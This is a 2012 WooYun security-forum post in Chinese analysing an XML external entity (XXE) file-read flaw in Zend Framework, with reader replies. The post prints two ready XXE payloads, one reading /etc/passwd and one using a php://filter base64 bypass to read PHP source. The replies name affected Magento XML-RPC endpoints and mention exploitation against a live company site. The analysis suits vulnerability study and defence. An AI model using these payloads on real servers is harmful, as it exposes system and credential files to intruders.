当前位置:WooYun(白帽子技术社区) >> php >> zend framework文件读取漏洞分析

zend framework文件读取漏洞分析

xsser (十根阳具有长短!!) | 2012-07-06 22:35

原始的漏洞公告在:

https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt

这是一个典型的xml实体注射漏洞,原因与之前80sec上的警告类似

http://www.80sec.com/xml-entity-injection.html

据@蟋蟀哥哥 在乌云上的漏洞报告提醒,一些开源软件因为使用了zend framework的xml模块功能导致存在了问题,Magento就是其中一个典型的软件,并且已经有多个在线网店证明存在这个问题。

原始的漏洞公告给出了测试方法:

<?xml version="1.0"?>
<!DOCTYPE foo [  
  <!ELEMENT methodName ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodCall>
  <methodName>&xxe;</methodName>
</methodCall>

但是因为真实的环境里,在读取php等文件的时候由于文件本身包含的<等字符会导致xml解析失败,于是导致读取文件失败,但在php里可以使用如下方式绕过:

<?xml version="1.0"?>
<!DOCTYPE foo [  
  <!ELEMENT methodName ANY >
  <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passswd" >]>
<methodCall>
  <methodName>&xxe;</methodName>
</methodCall>



完毕!

分享到:
24 个回复
  1. 1#
    回复此人 感谢
    蟋蟀哥哥 (̷ͣ̑̆ͯ̆̋͋̒ͩ͊̋̇̒ͦ̿̐͞҉̷̻̖͎̦̼) | 2012-07-06 23:00

    前排等粉

  2. 2#
    回复此人 感谢
    goderci (</null>) | 2012-07-06 23:04

    感谢分享,虽然我没怎么看明白.先记着.

  3. 3#
    回复此人 感谢
    zhk | 2012-07-06 23:06

    是那几个本地文件包含吗?

  4. 4#
    回复此人 感谢
    zhk | 2012-07-06 23:32

    -_-! 咳,E文不好,看了N久才知道怎么用......

  5. 5#
    回复此人 感谢
    horseluke (微碌) | 2012-07-06 23:41

    LZ给出的链接一直都说打不开,开了代理也不成,再细看,原来链接少了个冒号 -_-||

    1.12.0的修复进行了两次,看得出来修复过程挺纠结...

  6. 6#
    回复此人 感谢
    蟋蟀哥哥 (̷ͣ̑̆ͯ̆̋͋̒ͩ͊̋̇̒ͦ̿̐͞҉̷̻̖͎̦̼) | 2012-07-07 00:24

    @goderci zend framework 通用型漏洞。。

  7. 7#
    回复此人 感谢
    gainover (">_< ' / & \ 看啥,没见过跨站字符么) | 2012-07-07 00:34

    好家伙~~

  8. 8#
    回复此人 感谢
    蟋蟀哥哥 (̷ͣ̑̆ͯ̆̋͋̒ͩ͊̋̇̒ͦ̿̐͞҉̷̻̖͎̦̼) | 2012-07-07 01:45

    @gainover 现在框架随便找出一个漏洞都老牛逼了

  9. 9#
    回复此人 感谢
    hongygxiang (屌丝,纯屌!) | 2012-07-07 02:01

    窝擦、、、struts2还没停息下来,zend又来闹事啦。

  10. 10#
    回复此人 感谢
    蟋蟀哥哥 (̷ͣ̑̆ͯ̆̋͋̒ͩ͊̋̇̒ͦ̿̐͞҉̷̻̖͎̦̼) | 2012-07-07 02:03

    @hongygxiang 比struts的弱多了

  11. 11#
    回复此人 感谢
    蟋蟀哥哥 (̷ͣ̑̆ͯ̆̋͋̒ͩ͊̋̇̒ͦ̿̐͞҉̷̻̖͎̦̼) | 2012-07-07 02:04

    @xsser 这个php://,是不是和php的版本有关系。发现有的网站不能成功利用。

  12. 12#
    回复此人 感谢
    hongygxiang (屌丝,纯屌!) | 2012-07-07 02:36

    @蟋蟀哥哥 毕竟都是框架洞,struts是直接执行命令,这个当然无法和它媲美了。

  13. 13#
    回复此人 感谢
    _Evil (科普是一种公益行为) | 2012-07-07 06:41

    @ALL 和80sec那个一样呢 直接提交暴露

  14. 14#
    回复此人 感谢
    明. (ส็็็็็็็็็็็็็็็็็็็็็็็็็ส็็็็็็็็็็็็็็็็็็็็็็็็็ส็็็็็็็็็็็็็็็็็็็็็็็็็ส็็็็็็็็็็็็็็็็็็็็็็็็็ส็็็็็็็็็็็็็็็็็็็็็็็็็ส็็็็็็็็็็็็็็็็็็็็็็็็็ส็็็็็็็็็็็็็็็็็็็็็็็็็ส็็็็็็็็็็็็็็็็็็็็็็็็็ส็็็็็็็็็็็็็็็็็็็็็็็็็ส็็็็็็็็็็็็็็็็็็็็) | 2012-07-07 11:12

    弱弱问句,@xsser 那个是什么工具.?

  15. 15#
    回复此人 感谢
    蟋蟀哥哥 (̷ͣ̑̆ͯ̆̋͋̒ͩ͊̋̇̒ͦ̿̐͞҉̷̻̖͎̦̼) | 2012-07-07 11:24

    @明.   任何可以编辑http的软件都可以,包裹firefox插件这些都是可以的。。

  16. 16#
    回复此人 感谢
    zhk | 2012-07-07 13:25

    @明.   跟firefox的poster类似

  17. 17#
    回复此人 感谢
    情深 (ส็็็็็็็็็็็็็็็็็็็็็็็็็) | 2012-07-07 14:05

    @明.   貌似是Acunetix Web Vulnerability Scanner

  18. 18#
    回复此人 感谢
    Sogili (.) 长短短 (.) | 2012-07-07 16:14

    如果load后没有进入后面的逻辑有什么利用方式?

  19. 19#
    回复此人 感谢
    _Evil (科普是一种公益行为) | 2012-07-07 16:19

    @蟋蟀哥哥 @情深 @xsser Fiddler2汉化的专业工具 - -

  20. 20#
    回复此人 感谢
    _Evil (科普是一种公益行为) | 2012-07-07 16:24

    @xsser 你地址泄露了sinaapp的呵呵

  21. 21#
    回复此人 感谢
    _Evil (科普是一种公益行为) | 2012-07-07 16:27

    xmlrpc_server.php /api/xmlrpc/server.php 着两个

  22. 22#
    回复此人 感谢
    蟋蟀哥哥 (̷ͣ̑̆ͯ̆̋͋̒ͩ͊̋̇̒ͦ̿̐͞҉̷̻̖͎̦̼) | 2012-07-07 22:17

    @_Evil 明确告诉你不是sinaapp。。我截的图。。是某个巨型体育用品公司

  23. 23#
    回复此人 感谢
    _Evil (科普是一种公益行为) | 2012-07-07 22:30

    @蟋蟀哥哥 -_-好吧我错了

  24. 24#
    回复此人 感谢
    king | 2012-07-09 14:19

    @_Evil 明显的AWVS好波,,那来的Fiddler2,都相差十万八千里呢!

添加新回复

登录 后才能参与评论.

WooYun(白帽子技术社区)

网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地

登录

其它内容


Copyright © 2010 www.wooyun.org All Rights Reserved. 吉ICP备12001400号-1